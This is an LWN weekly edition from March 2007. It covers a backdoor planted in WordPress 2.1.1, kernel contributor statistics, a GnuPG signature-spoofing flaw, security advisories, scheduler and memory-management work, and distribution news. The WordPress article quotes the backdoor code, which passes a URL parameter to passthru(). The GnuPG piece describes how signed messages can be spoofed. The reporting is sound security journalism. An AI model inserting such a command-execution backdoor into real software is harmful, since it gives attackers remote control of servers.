LWN Weekly Edition
Leading itemsSecurity
Kernel development
Distributions
Development
Linux in the news
Announcements
->Multipage format
This page
Previous weekFollowing week
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
LWN.net Weekly Edition for March 8, 2007The backdooring of WordPressWordPress is, according to its web site, "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability." In other words, it is yet another weblog platform written in PHP. Like many such platforms, it has a fairly long history of security issues. Even so, the code samples featured in this ifsecure advisory are on the extreme side. One example:
function get_theme_mcommand($mcds) {
passthru($mcds);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
Needless to say, code like this is not a programming error - it is a deliberate backdoor. The project responded quickly, replacing the compromised 2.1.1 release with a fixed 2.1.2 and sending out an advisory. Even so, there are probably sites which installed the 2.1.1 release (which appears to have been distributed with the backdoor for about one week) and which are still vulnerable. It would be nice if the project would make a little more information available. As others have noted, there are no checksums of good or compromised versions of the software. We also know nothing about how the code was compromised in the first place, beyond this:
It was determined that a cracker had gained user-level access to
one of the servers that powers wordpress.org, and had used that
access to modify the download file.
Inquiring minds want to know how this could have come about; is there a separate WordPress vulnerability which still needs to be fixed? What steps have been taken to ensure that this sort of security breach cannot happen to future WordPress releases? The insertion of backdoors into services which are directly exposed to the Internet is a scary business; anybody who is running WordPress should be asking the project some serious questions to convince themselves that they will not have to go through this again. Your editor searched in vain for any such discussion in the WordPress forums. In one sense, WordPress users can consider themselves lucky: the code implementing the backdoor was so crude that it had little chance of escaping detection for long. Had the backdoor code been more subtle, it could well have survived for much longer. One assumes that the WordPress developers are auditing their code, looking for holes inserted with more care. But if they are, they are not talking about it. In general, backdoors are a frightening prospect for free software developers to ponder. The relatively open nature of many projects must provide a tempting target for scheming crackers, and it is not that hard to imagine that a good-enough developer could manage to code a backdoor in a sufficiently obscure manner that it gets through the review process without being detected. There may well be a project distributing such code now. That said, a quick look at the (relatively thin) history of compromised free software distributions shows that the normal contribution process is not the preferred way to insert backdoors. Instead, crackers seem to focus on breaking into servers and modifying code there. We can count ourselves fortunate; such attacks are easier to detect and recover from. The real lesson from this episode, as from the ones that came before, is that there is a real incentive for crackers to insert malware into free software distributions. (Clearly, the same incentive exists for proprietary software, but that does not concern us here). Any project which is distributing code with any security considerations at all (and that is most code) needs to think about this threat. If your processes - or your servers - are vulnerable to attack, it may be your project which finds its way into the headlines for the wrong reasons.
Who's writing 2.6.21 and related issuesOur article Who wrote 2.6.20?, which appeared two weeks ago, generated a strong response. There is, it seems, a lot of interest in where this code is coming from, but nobody had gotten around to doing the crunching to figure it out. That article calls for a followup in a few ways.First, those who saw the article early on may want to take another look, as some of the tables have been changed. There was only one serious mistake to fix - one developer's affiliation was incorrectly guessed by the code - but further information has also helped to shrink the "unknown" column somewhat. The original tables can be found from the article (for whatever historical reasons may exist), but the tables in the article itself are the current ones. The 2.6.21 cycle has moved far enough along as of this writing (the 2.6.21-rc3 prepatch is due any time) that it's worth taking a look at the statistics for the just over 4,000 changesets which have been merged. There are some familiar names here, but some new ones as well. The reflect the different nature of this development cycle, 2.6.21 will have fewer changes in the virtualization area, for example, but it has some significant core changes (like the clockevents and dynamic tick work). A somewhat different set of developers had work ready to merge this time around, and the results show that. Anyway, the developers with the most work merged this time around are:
On the side of removing code, the list of names remains about the same:
Adrian Bunk continues to remove code from the kernel at an amazing rate. Also about the same is the table of signoffs:
The list of developers contributing code to a given kernel release can change over time, but the people through whom those patches pass - the subsystem maintainers - remain about the same. These developers form the infrastructure which does the work of getting reviewed code into the mainline kernel. Here's the by-employer tables for 2.6.21-rc:
Many of the names are the same, but Red Hat does not dominate to quite the same extent as in 2.6.20. The percentage of patches contributed by developers known to be working on their own time has increased slightly. Finally, some commenters on the original article requested the release of the code used to generate the numbers. Your editor has some qualms about doing so. The biggest among them is not that the code is an embarrassing hack with, presumably, at least one bug still in it. Neither is it the fact that the code could be seen as a competitive tool for LWN; frankly, there's nothing that complicated there. The biggest worry is related to the attention these numbers drew, and the fact that a couple of developers have mailed in to note that they have received job offers as a result of appearing in the LWN lists. In addition, a few employers have contacted us to be sure that their "account" is credited with the work of all of their employees. The numbers your editor has generated are approximations, but some people clearly see them as being important. The editors at LWN have an interest in covering the free software community while minimizing the changes that such coverage might cause - most of the time, at least. It seems plausible that, if the "top 20 contributors list" is seen as a desirable place to appear - with positive career benefits - developers might change their behavior as a result. It would be a shame to start seeing kernel patches aimed mainly at increasing a developer's count of lines changed. Such patches, one assumes, would not fare well in the review process, but it would be better if the situation did not come up at all. The issue of the mapping between developers and their employers is also worth some consideration. Some of that information was obtained directly from the developers with a promise not to disclose it further; that promise must be kept. Beyond that, developers tend to change employers over time, and the code is not currently smart enough to deal with that. This shortcoming is not a problem when looking at a single release cycle, but it clearly would be an issue for multi-year analysis. The code could be improved, but it's not at all clear that the maintenance and distribution of a database of kernel developers' work histories is something LWN wants to get into. There are serious privacy issues to consider. Despite these worries, the code is being released. In the end, it's not as if somebody else would have all that much trouble reproducing it. Some of the employer information has been taken out in response to the concerns outlined above, though. A tarball of the initial release can be found here; your editor is looking forward to the flood of patches which will improve the system.
Security GnuPG signed message spoofing vulnerabilityAn advisory about a problem in GNU Privacy Guard (GnuPG) would normally cause worries about an implementation flaw leading to insecurely encrypted data. Thankfully, this particular vulnerability does not fall into that category and data encrypted using GnuPG is not at risk from it; it is, instead, a hole which allows attackers to spoof signatures. This vulnerability highlights an interesting interaction between GnuPG and the applications that use it. The flaw is not so much in how GnuPG does its work, rather it is in how it presents it. GnuPG is an implementation of the OpenPGP standard which governs messages encrypted with public-key encryption. The standard is described in RFC 2440 and is descended from the original Pretty Good Privacy (PGP) program that Phil Zimmerman released (much to the chagrin of the US Government) in 1991. Many different mail programs use GnuPG (or the related GnuPG Made Easy (GPGME) library) to handle encrypted email; these programs include most open source email clients (KMail, Evolution, Thunderbird via the EnigMail plugin, mutt, etc.). All are vulnerable to the spoof - as is the gpg command-line tool, depending on how it is used. One of the features of OpenPGP is digital signing of messages so that the recipient can ensure that the message they receive is the same as the one that was sent. It is this digital signature that is vulnerable to this attack as it can be spoofed; making it appear that unsigned text is covered by a valid signature. An attacker can insert malicious text into an existing message and have it appear to have been sent by the signer. OpenPGP messages consist of a set of "packets" that correspond to different sections of a message (plaintext, encrypted, signature, compressed, ascii-armored, etc). Taking two valid OpenPGP messages and concatenating them produces a longer, but still valid, OpenPGP message. The simplest way to exploit the flaw is to take a plaintext packet and add it to the front of a signed plaintext packet. If the user attempts to verify the message by invoking gpg < msgfile, they will see the contents of both of the plaintext packets followed by a statement that the signature was verified. Nothing in the output indicates the presence of two packets with different signature status. If this were the only issue, there would be a relatively easy, but not completely satisfying, workaround; do not redirect stdin from a file when using gpg. When it is invoked as gpg msgfile, GnuPG writes each individual plaintext packet into a separate file and, depending on the filenames specified in the packet, the above example would either create two files or prompt asking whether to overwrite when it encounters the second packet. That prompt, or the presence of two files, might be enough to alert the observant user to an anomaly, but is hardly foolproof. Unfortunately, mail clients typically invoke gpg via the output end of a pipe which allows them to be spoofed. GnuPG does provide the --status-fd mode to prevent just this kind of attack by producing more status information on the specified file descriptor. The status information is not particularly user-friendly and might not alert a casual user to the spoof, but it certainly can be used by a program to detect the spoof. This is how GnuPG recommends that it be used by other programs but the developers of many mail clients ignored that advice with the result that their code is vulnerable. Normally this might be considered a problem for the mail client developers to solve, but the GnuPG team decided to make changes to GnuPG and GPGME to alleviate the problem. Updated versions of GnuPG will no longer process multiple messages in a single invocation, avoiding the mingling of packets with different signature status. GPGME has been changed to avoid the spoofing even when it is using a vulnerable version of GnuPG. It is likely that the various mail clients will need to be updated eventually as well because they may well rely on GnuPG to process multiple messages in a single pass. The mail clients may not correctly process all of the email types that they did in the past, but they will not be vulnerable to this kind of attack. The advisory has a wealth of information about the flaw and various ways that it can be exploited; it is well worth a read for those interested. This is an interesting bug because it lives between the GnuPG software and its users (both human and program). The GnuPG developers could have pushed this off as a problem for those users, but took a more helpful approach. If the command-line version (gpg < msgfile) of the flaw did not exist, it seems possible that they would have chosen differently and the mail client development teams would instead be scrambling to release updates.
Brief items The Month of PHP BugsThe Month of PHP Bugs (March) has been announced. "This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core. During March 2007 old and new security vulnerabilities in the Zend Engine, the PHP core and the PHP extensions will be disclosed on a day by day basis. We will also point out necessary changes in the current vulnerability manag[e]ment process used by the PHP Security Response Team."
New vulnerabilities GnuPG: unsigned data injection vulnerability
mod_jk: stack overflow
mod_python: information disclosure
snort: remote arbitrary code execution
STLport: buffer overflows
tcpdump: denial of service
util-linux: information disclosure
wordpress: cross-site scripting
Updated vulnerabilities acroread: multiple vulnerabilities
apache: cross-site scripting
bind: denial of service
bluez-utils: hidd vulnerability
bugzilla: multiple vulnerabilities
busybox: insecure password generation
chmlib: remote execution of arbitrary code
clamav: directory traversal, denial of service
cpio: arbitrary code execution
vixie-cron: privilege escalation
cscope: buffer overflows
cscope: buffer overflows
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
dovecot: index cache file handling error
ekiga: format string vulnerability
elinks: arbitrary file access
enigmail: memory allocation errors
fail2ban: denial of service
fetchmail: password disclosure and DOS
ffmpeg: buffer overflows
Mozilla stuff: multiple vulnerabilities
freeradius: several vulnerabilities
freetype: integer overflows
gcc: file overwrite vulnerability
gd: buffer overflow
gdb: buffer overflow
gdm: improper file permissions
gedit: format string vulnerability
gnomemeeting: format string flaw
gnupg: stack overwrite
grip: buffer overflow
gv: stack-based buffer overflow
gzip: multiple vulnerabilities
horde-kronolith: local file inclusion
ImageMagick: buffer overflows
imlib2: arbitrary code execution
java: multiple vulnerabilities
kdelibs: integer overflow
kdelibs: kate backup file permission leak
kdelibs: cross-site scripting
kernel: denial of service
kernel: denial of service
kernel: denial of service
kernel: denial of service by memory consumption
kernel: denial of service
kernel: denial of service
kernel: denial of service
kernel: multiple vulnerabilities
krb5: uninitialized pointers
krb5: local privilege escalation
libgadu: memory alignment bug
libgtop2: buffer overflow
libmodplug: boundary errors
libpng: buffer overflow
libpng: heap based buffer overflow
libtiff: buffer overflow
libvncserver: authentication bypass
libxml2 - arbitrary code execution
libxml2: multiple buffer overflows
lynx: arbitrary command execution
mysql: format string bug
MySQL: privilege violations
MySQL: logging bypass
nbd: arbitrary code execution
ncompress: buffer underflow
nexuiz: arbitrary code execution, denial of service
openldap: security bypass
OpenSSH: denial of service
openssh: privilege separation issue
openssh: remote denial of service
php: several vulnerabilities
php: multiple vulnerabilities
php: buffer overflows
phpbb2: missing input sanitizing
phpbb2: multiple vulnerabilities
postgresql: insufficient verification
postgresql: SQL injection
quake: buffer overflow
rpm: arbitrary code execution
samba: several vulnerabilities
Mozilla: multiple vulnerabilities
shadow-utils: mailbox creation vulnerability
slocate: information disclosure
smb4k: multiple vulnerabilities
snort: denial of service
spamassassin: denial of service
sun-jdk: arbitrary code execution
ufo2000: multiple vulnerabilities
ulogd: buffer overflow
unzip: long file name buffer overflow
w3c-libwww: possible stack overflow
wireshark: multiple vulnerabilities
xine: format string vulnerabilities
xine-lib: buffer overflow
xine-lib: buffer overflow
xinit: race condition
X.org: local privilege escalations
X.org: integer overflows
xpdf: buffer overflow
Page editor: Jonathan Corbet Kernel development Brief items Kernel release statusThe current 2.6 prepatch is 2.6.21-rc3, released by Linus on March 6. It contains quite a few fixes and some KVM enhancements. Says Linus: "...there's some hope that it will work more widely than -rc1 and -rc2 did." The long-form changelog has the details.As of this writing, no patches have been merged into the mainline git repository since -rc3 was released. The current -mm tree is 2.6.21-rc2-mm2. Recent changes to -mm include a set of memory anti-fragmentation patches (see below), the dropping of the buffered filesystem I/O patches, the Devicescape wireless stack (now rebranded "mac80211"), and a new krealloc() memory allocation function. For older kernels: 2.6.19.6 and 2.6.19.7 were released on March 2. They contain a fair number of fixes, at least one of which is security-related. "Barring anything major, there will not be any more 2.6.19 releases. If you disagree with this, please let the stable team know about the patches that you feel must be in a new release. We need to move on to flushing out the very large backlog of 2.6.20-stable patches." 2.6.16.43-rc1 was released on March 1. It contains a fair number of fixes and a few new hwmon drivers.
Kernel development news Quotes of the week
Ooh you have a vm patch that helps swap on the desktop! I can help you here
with my experience from swap prefetch.
-- Con Kolivas (thanks to Jos Poortvliet).
1. Get it reviewed and have noone show any evidence it harms There, that should get you as far as 4. I haven't figured out what 4 is yet. I believe it may be goto 1;
-mm is crap at present. Well. Mainline is crap at present, and
-mm is crap^2. I think I might be about to throw vast amounts of
code overboard.
-- Andrew Morton
I'm really fed up with having to pull big changes after the merge
window, because it just doesn't seem to let up. I'm going to go
postal on the next maintainer who doesn't understand what "merge
window" and "fixes only" means.
-- Linus Torvalds
The Rotating Staircase Deadline SchedulerCPU scheduling seems to be one of those eternally unfinished jobs. Developers can work on the CPU scheduler for a while and make it work better, but there will always be workloads which are not served as well as users would like. Users of interactive systems, in particular, tend to be sensitive to scheduler latencies. In response, the current scheduler has grown an elaborate array of heuristics which attempt to detect which processes are truly interactive and give them priority in the CPU. The result is complicated code - and people still complain about interactive response.Enter Con Kolivas, who has been working on improving interactivity for some time. His latest proposal is the Rotating Staircase Deadline Scheduler (RSDL), which attempts to provide good interactive response with a relatively simple design, complete fairness, and bounded latency. This work takes ideas from Con's earlier staircase scheduler (covered here in June, 2004), but with a significantly different approach.
When a process uses its quota at a given priority level, it is dropped down to the next priority and given a new quota. That process can thus continue to run, but only after the higher-priority processes have had their turn. As processes move down the staircase, they increasingly must contend with the lower-priority processes which have been patiently waiting on the lower levels. The end result is that even the lowest-priority processes get at least a little CPU time eventually. An interesting feature of this scheduler is that each priority level has a quota of its own. Once the highest priority level has used its quota, all processes running at that level are pushed down to the next-lower level, regardless of whether they have consumed their individual CPU time quotas or not. As a result of this "minor rotation" mechanism, processes waiting at lower priority levels need only cool their heels for a bounded period of time before all other processes are running at their level. The maximum latency for any process waiting to run is thus bounded, and can be calculated; there is no starvation with this scheduler. As processes use up their time, they are moved to a second array, called the "expired" array; there they are placed back at their original priority. Processes in the expired array do not run; they are left out in the cold until no more processes remain in the currently active array - or until all processes are pushed off the bottom of the active array as a result of minor rotations. At that point, a "major rotation" happens: the active and expired arrays are switched and the whole series of events restarts from the beginning. The current scheduler tries to locate interactive tasks by tracking how often each process sleeps; those seen to be interactive are then rewarded with a priority boost. The RSDL does away with all that. Instead, processes which sleep simply do not use all of their time at the higher priority levels. When they run, they are naturally advantaged over their CPU-hungry competition. If a process sleeps through a major rotation, its quota goes back into the run queue's priority-specific quota value. Thus, it will be able to run at high priority even if other high-priority processes, which have been running during this time, have been pushed to lower priorities through minor rotations. All of this should add up to quick response from interactive applications. A few benchmarks posted by Con show that systems running with RSDL perform slightly better than with the stock 2.6.20 scheduler. The initial reports from testers have been positive, with one person urging that RSDL go into 2.6.21. That will not happen at this point in the release cycle, but Linus is favorable to including RSDL in a future kernel:
I agree, partly because it's obviously been getting rave reviews so
far, but mainly because it looks like you can think about behaviour
a lot better, something that was always very hard with the
interactivity boosters with process state history.
Con has recently been heard to complain about difficulties getting his interactivity improvements into the mainline. This time around, however, he may find the course of events to be rather more gratifying.
Short topics in memory managementMemory management has been a relatively quiet topic over much of the life of the 2.6.x kernels. Many of the worst problems have been solved and the MM hackers have gone on to other things. That does not mean that there is no more work to do, however; indeed, things might be about to heat up. A few recent discussions illustrate the sort of pressures which may lead to a renewed interest in memory management work in the near future.Mel Gorman's fragmentation avoidance patches have been discussed here a few times in the past. The core idea behind Mel's work is to identify pages which can be easily moved or reclaimed and group them together. Movable pages include those allocated to user space; moving them is just a matter of changing the relevant page table entries. Reclaimable pages include kernel caches which can be released should the need arise. Grouping these pages together makes it easy for the kernel to free large blocks of memory, which is useful for enabling high-order allocations or for vacating regions of memory entirely. In the past, reviewers of Mel's patches have disagreed over how they should work. Some argue in favor of maintaining separate free lists for the different types of allocations, while others feel that this sort of memory partitioning is just what the kernel's zone system was created to do. So, this time around, Mel has posted two sets of patches: a list-based grouping mechanism and a new ZONE_MOVABLE zone which is restricted to movable allocations.
These patches have found their way into the -mm tree, though Andrew Morton is still unclear on whether he thinks they are worthwhile or not. Among other things, he is concerned about how they fit with other, related work, especially memory hot-unplugging and per-container memory limits. While patches addressing both areas have been posted, nothing is really at a point where it is ready to be merged. This discussion between Mel and Andrew is worth reading for those who are interested in this topic. The hot removal of memory can clearly be helped by Mel's work - memory which is subject to removal can be restricted to movable and reclaimable allocations, allowing it to be vacated if need be. Not everybody is convinced that hot-unplugging is a useful feature, though. In particular, Linus is opposed to the idea. The biggest potential use for hot-unplugging is for virtualization; it allows a hypervisor to move memory resources between guests as their needs change. Linus points out that most virtualization mechanisms already have mechanisms which allow the addition and removal of individual pages from guests; there is, he says, no need for any other support for memory changes. Another use for this technique is allowing systems to conserve power by turning off banks of memory when they are not needed. Clearly, one must be able to move all useful data out of a memory bank before powering it down. Linus is even more dismissive of this idea:
The whole DRAM power story is a bedtime story for gullible
children. Don't fall for it. It's not realistic. The hardware
support for it DOES NOT EXIST today, and probably won't for several
years. And the real fix is elsewhere anyway...
More information on his objections is available here for those who are interested. In short, Linus thinks it would make much more sense to look at turning off entire NUMA nodes rather than individual memory banks. That notwithstanding, Mark Gross has posted a patch enabling memory power-down which includes some basic anti-fragmentation techniques. Says Mark:
To be clear PM-memory will not be useful unless you have workloads
that can take advantage of it. The identified workloads are not
desktop workloads. However; there is a non-zero number of
interested users with applicable workloads that make pushing the
enabling patches out to the community worth while. These workloads
tend to be within network elements and servers where memory
utilization tracks traffic load.
It has also been suggested that resident set size limits (generally associated with containers) can solve many of the same problems that the anti-fragmentation work is aimed at. Rik van Riel was heard to complain in response that RSS limits could aggravate the scalability problems currently being experienced by the Linux memory management system. That drew questions from people like Andrew, who were not really aware of those problems. Rik responded with a few relatively vague examples; his ability to be specific is evidently restricted by agreements with the customers experiencing the problems. That led to a whole discussion on whether it makes any sense to try to address memory management problems without test cases which demonstrate those problems. Rik argues that fixing test cases tends to break things in the real world. Andrew responds:
Somehow I don't believe that a person or organisation which is
incapable of preparing even a simple testcase will be capable of
fixing problems such as this without breaking things.
Rik has put together a page describing some problem workloads in an attempt to push the discussion forward. One of Andrew's points is that trying to fix memory management problems caused by specific workloads in the kernel will always be hard; the kernel simply does not always have the information to know which pages will be needed soon and which can be discarded. Perhaps, he says, the right answer is to make it easier for user space to communicate its expected future needs. To that end, he put together a pagecache management tool for testing. It works as an LD_PRELOAD library which intercepts file-related system calls, tracks application usage, and tells the kernel to drop pages out of the cache after they have been used. The result is that common operations (copying a kernel tree, for example) can be carried out without forcing other useful data out of the page cache. There were some skeptical responses to this posting. There was also some interest and some discussion of how smarter, application-specific policies could be incorporated into the tool. A possible backup tool policy, for example, would force the output file out of memory immediately, track pages read from other files and force them back out - but only if they were not already in the page cache, and so on. It remains to be seen whether anybody will run with this tool and try to use it to solve real workload problems, but there is some potential there. The kernel does not always know best.
Introducing utraceThe interface for tracing programs under Linux is the ptrace() system call. It is used primarily by debuggers, but there are other applications too; User-mode Linux can use ptrace(), for example. The interface gets the job done, but there are few system calls which endure more criticism. The list of ptrace() shortcomings is long, its interface is difficult for user-space developers to use and for kernel-space developers to maintain, it is inefficient, and it has been the source of more than one security problem over the years. Still, ptrace() endures; it is part of the user-space API and there is nothing better available.Soon there may be a better alternative, in the form of the "utrace" patch (by Roland McGrath) which is currently in the -mm tree. Utrace replaces ptrace() entirely, while maintaining the same interface to user space. As such, it is a useful cleanup of a difficult system call. The real value of utrace, however, is likely to be seen in new tracing interfaces in the future. The core utrace code does not interface with user space at all; instead, it is an in-kernel API which can be used to build kernel-based tracing mechanisms. These mechanisms are based around the concept of a "tracing engine," which is defined by the usual structure full of method pointers. This structure (struct utrace_engine_ops) has fourteen callbacks, each covering something which the traced process might do or have done to it. For example, one callback is:
u32 (*report_syscall_entry)(struct utrace_attached_engine *engine,
struct task_struct *tsk,
struct pt_regs *regs);
Whenever the traced process invokes a system call, the tracing engine will (if it has asked for this event) receive a call to its report_syscall_entry() callback. The call happens at a "safe" time before the system call is executed; no locks are held, and the tracing process can safely access the traced process's state. The callback returns a bitmask specifying what happens next; the bitmask can change the tracing state, detach the engine, hide the event from other tracing engines, and more. A tracing engine is put into service with:
struct utrace_attached_engine *
utrace_attach(struct task_struct *target, int flags,
const struct utrace_engine_ops *ops,
unsigned long data);
This call will attach the engine to the given target process. There can be more than one engine attached to any given process - a significant difference from ptrace(). A newly-attached engine does not actually do anything, one can think of it as being in an idling state. Putting the engine into gear requires setting one or more action flags with:
int utrace_set_flags(struct task_struct *target,
struct utrace_attached_engine *engine,
unsigned long flags);
There is a special flag (UTRACE_EVENT(QUIESCE)) which puts the target process into a quiescent state. In general, operating on the task first requires setting this flag, then waiting for a callback (to the report_quiesce() engine method) that says the process is truly stopped. There is a whole other set of events which can be requested: forking, execing a new program, receiving a signal, process death, system call entry and exit, etc. Single-stepping through instructions and program blocks is also handled through the event mechanism. A signal can be forced into the target process with:
int utrace_inject_signal(struct task_struct *target,
struct utrace_attached_engine *engine,
u32 action, siginfo_t *info,
const struct k_sigaction *ka);
Signals injected in this manner are delivered to the target process immediately; they are not queued in the usual manner. There is more to the utrace API than is described in this brief overview, including an API for describing and working with CPU registers; see the excellent documentation file packaged with the patch for more details. Also included with the patch is a complete reimplementation of ptrace() built on top of utrace. Reimplementing ptrace() is only so interesting, however, even if the result is a big improvement. The real purpose behind utrace looks to be to inspire the creation of the next generation of user-space process tracing APIs, and more. Roland told your editor:
The intent of the utrace API is not just to facilitate my writing
the one great new userland API to replace ptrace. Its core purpose
is to put writing a new user debugging facility more on par with
writing a software device driver, a filesystem, or a network stack,
so that many people can come up with ideas and experiment without
doing brain surgery every time. It ties up the really nasty
low-level implementation issues, and lets different unrelated
facilities coexist without interfering with each other.
In other words, while utrace should enable the eventual retirement of ptrace(), there is more coming than that. If and when utrace makes it into the mainline, look for it to inspire interesting developments in a number of areas.
Patches and updates Kernel trees
Core kernel code
Development tools
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Architecture-specific
Virtualization and containers
Miscellaneous
Page editor: Jonathan Corbet Distributions News and Editorials A Quick Look at Red Hat Enterprise Linux 5Red Hat Enterprise Linux (RHEL) 5 is due to be released on March 14. In addition to the rock-solid Server and Client software, RHEL 5 includes some unsupported technology previews, including Stateless Linux, GFS2, FS-Cache, Compiz, AIGLX and much more.RHEL 5 features a 2.6.18 kernel with virtualization support and many improvements over the 2.6.9 kernel used by RHEL 4. A few features have been backported from 2.6.19 as well for improved performance and scalability. Red Hat Enterprise Linux 5 Release Notes are available by platform: ia64, ppc, S390, x86 and x86_64. Though not finalized yet, they provide a good look at what you'll find in RHEL 5.
New Releases 64 Studio 1.2.0 'Lover's Rock' released64 Studio is a GNU/Linux distribution made for digital content creation, including audio, video, graphics and publishing tools. A remix of Debian testing, it comes in both AMD64/Intel64 and 32-bit flavors. Version 1.2.0 is a development release, based on a snapshot of Debian from February 14th. "The 2.6.19-rt kernel package included in this release may cause a kernel oops with certain USB audio hardware. Users of 64 Studio on production systems may therefore prefer to stick with the stable 1.0 release for the time being."
BackTrack v.2.0 releasedBackTrack 2.0 has been released. BackTrack is a Slackware-based live CD distribution aimed at penetration testing. "Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished." The BackTrack page has more information.
Announcing Fedora 7 Test 2 (6.91)Fedora 7 Test 2 has been released. Click below for download information, some known problems and a look at what's new since Test 1.
Announcing Foresight Linux 1.0.1The Foresight Linux community has announced the release of version 1.0.1 of Foresight Linux. "Foresight Linux is a desktop linux system that just works. Our mission is to provide a truely useful desktop system that is friendly for the novice user, as well as flexible for the power user. Great attention has been payed to making things simple and integrated, and we seek an excellent end-user experience by removing the barriers commonly associated with usage of the Linux Desktop."
Musix GNU+Linux 0.99 releasedMusix GNU+Linux 0.99, a Debian-based distribution aimed at multimedia creation, has been released. "The most remarkable programs in Musix 0.99 are: Ardour 0.99.3 (audio sequencer), Rosegarden 1.4.0 (audio/midi sequencer), Cinelerra (video edition), Bluefish (web design), GIMP (image manipulation), Inkscape (vectorial graphic design) and Blender3D (3D animation)."
Trustix Secure Linux 3.0.5The Comodo Trustix team has announced the release of Trustix Secure Linux 3.0.5, an update to the previous "Tikka Masala". The new releases is named "Mirch Masala" to describe the new interesting changes associated. "The highlighted change for this release is the return of anaconda as the preferred choice of installer for Trustix. In addition some of the core packages have been updated to their latest revisions to provide the same level of security and stability."
Ubuntu Herd 5 releasedThe fifth Feisty Fawn Herd 5 is out, in Ubuntu, Kubuntu, Edubuntu and Xubuntu flavors. "The primary focus during the time from Herd 4 has been bug fixing. Please refer to http://www.ubuntu.com/testing/herd5 for information on changes in Ubuntu, and https://wiki.kubuntu.org/FeistyFawn/Herd5/Kubuntu for changes in Kubuntu."
Distribution News Debian Project Leader ElectionsThe platforms for the candidates are now available, as are any rebuttals. The Debian Project Leader Elections 2007 page has links to each candidate's platform, and any rebuttals from that candidate have been appended to the platform. The DPL Debate will be on IRC in #debian-dpl-debate on irc.debian.org (OFTC) at 21:30 UTC, March 10th 2007, ending at 00:30 UTC, March 11th 2007. Discussion of the debate will occur in #debian-dpl-discuss on the same network.
Daniel Robbins leaves Gentoo, againIt seems you can't go home again. Shortly after rejoining the project, Gentoo founder Daniel Robbins has left again. Click below for links to relevant messages on gentoo-devel mailing list and Alexandre Rostovtsev's humorous summary of the events.
The projected demise of GNU-DarwinGNU-Darwin is a free software distribution for PowerPC, Intel and AMD, based on FreeBSD and of course GNU software. "I have recently gotten a handle on the life expectancy of our Distribution in years. Given the current rate of decay and deterioration of our equipment, including file system damage and obsolescence, we can expect that GNU-Darwin will be dead as a the proverbial door-nail within 9 years. In order to avert the demise of the Distro, it would take a major rejuvination of talent, resources, and interest, which is not forthcoming it appears."
OpenSolaris starter kitThe OpenSolaris starter kit includes tutorials, documentation, and two DVDs filled with useful software like Solaris Express and live CD images for Nexenta OS, BeleniX and SchilliX, Sun Studio compilers and OpenSolaris source code.
openSUSE and GNOMEHere's a word from the GNOME team at Novell. "The team at Novell responsible for GNOME have been quiet in openSUSE for sometime, even though we already have several great external contributors like James Ogley and Andreas Hanke and we've pushed in significant general technologies like Compiz/Xgl, NetworkManager and Beagle. All this is changing though, we've had an IRC channel for a while but we haven't really advertised it (#opensuse-gnome on irc.freednode.net) and we have an opensuse-gnome mailing list as well now."
MOTU Application processThe Ubuntu Masters Of The Universe (MOTU) have a new mailing list and a new application form for those who are already involved to take the next step and become a MOTU.
Distribution Newsletters DistroWatch Weekly, Issue 192The DistroWatch Weekly for March 5, 2007 is out. "This is the most enjoyable part of the year for those Linux users who enjoy testing the development releases of Linux distributions - Fedora, Mandriva, Ubuntu, SimplyMEPIS and PCLinuxOS all delivered brand new test builds last week and the first impressions of all them are highly positive. In the news section, a start-up project releases Ubuntu Muslim Edition, Sun Microsystems joins the Free Software Foundation, and Linux and open source software makes a serious impact on education. Finally, don't miss our commentary on the future of DistroWatch Weekly where you can have your say over the direction your favourite publication takes over the next few weeks."
Fedora Weekly News Issue 79The Fedora Weekly News for March 5, 2007 covers Announcing Fedora 7 Test 2 (6.91), Reduction of Fedora releases (in Bugzilla), Phoronix: Fedora 7 KVM Virtualization How-To, IBM DeveloperWorks: Build a Fedora Live CD, Linux.com: Fedora cleans its repositories, considers move to Free Software, and several other topics.
Gentoo Weekly NewsletterThe Gentoo Weekly Newsletter for February 26, 2007 looks at GWN is seeking help, Heard in the community, Gentoo in the press and several other topics.
Package updates Fedora Core 5 Update: kernel-2.6.19-1.2288.2.4.fc5Xen is back in the Fedora kernel package.
